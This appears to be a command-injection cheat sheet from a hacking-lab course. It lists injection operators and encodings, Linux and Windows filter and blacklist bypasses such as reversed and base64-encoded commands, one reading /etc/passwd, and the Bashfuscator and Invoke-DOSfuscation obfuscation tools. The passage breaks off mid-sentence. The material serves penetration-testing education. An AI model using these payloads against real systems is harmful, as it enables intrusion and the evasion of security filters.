Injection Operator Injection Character URL-Encoded Character Executed Command
Semicolon ; %3b Both
New Line \n %0a Both
Background & %26 Both (second output generally shown first)
Pipe | %7c Both (only second output is shown)
AND && %26%26 Both (only if first succeeds)
OR || %7c%7c Second (only if first fails)
Sub-Shell `` %60%60 Both (Linux-only)
Sub-Shell $() %24%28%29 Both (Linux-only)
Linux
printenv Can be used to view all environment variables
Spaces
%09 Using tabs instead of spaces
${IFS} Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())
{ls,-la} Commas will be replaced with spaces
Other Characters
${PATH:0:1} Will be replaced with /
${LS_COLORS:10:1} Will be replaced with ;
$(tr '!-}' '"-~'<<<[) Shift character by one ([ -> \)
Blacklisted Command Bypass
Code Description
Character Insertion
' or " Total must be even
$@ or \ Linux only
Case Manipulation
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") Execute command regardless of cases
$(a="WhOaMi";printf %s "${a,,}") Another variation of the technique
Reversed Commands
echo 'whoami' | rev Reverse a string
$(rev<<<'imaohw') Execute reversed command
Encoded Commands
echo -n 'cat /etc/passwd | grep 33' | base64 Encode a string with base64
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) Execute b64 encoded string
Windows
Filtered Character Bypass
Code Description
Get-ChildItem Env: Can be used to view all environment variables - (PowerShell)
Spaces
%09 Using tabs instead of spaces
%PROGRAMFILES:~10,-5% Will be replaced with a space - (CMD)
$env:PROGRAMFILES[10] Will be replaced with a space - (PowerShell)
Other Characters
%HOMEPATH:~0,-17% Will be replaced with \ - (CMD)
$env:HOMEPATH[0] Will be replaced with \ - (PowerShell)
Blacklisted Command Bypass
Code Description
Character Insertion
' or " Total must be even
^ Windows only (CMD)
Case Manipulation
WhoAmi Simply send the character with odd cases
Reversed Commands
"whoami"[-1..-20] -join '' Reverse a string
iex "$('imaohw'[-1..-20] -join '')" Execute reversed command
Encoded Commands
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami')) Encode a string with base64
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
Evasion Tools
Linux
A handy tool we can utilize for obfuscating bash commands is Bashfuscator.
git clone https://github.com/Bashfuscator/Bashfuscator
cd Bashfuscator
python3 setup.py install --user
Windows
There is also a very similar tool that we can use for Windows called DOSfuscation. Unlike Bashfuscator, this is an interactive tool.
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
Invoke-DOSfuscation> help
We can even use tutorial to see an example of how the tool works. Once we are set, we can start using the tool, as follows:
Invoke-DOSfuscation> SET COMMAND type C:\Users\htb-student\Desktop\flag.txt
Invoke-DOSfuscation> encoding
Invoke-DOSfuscation\Encoding> 1
...SNIP...
Result:
typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt
Finally, we can try running the obfuscated command on CMD, and we see that it indeed works as expected:
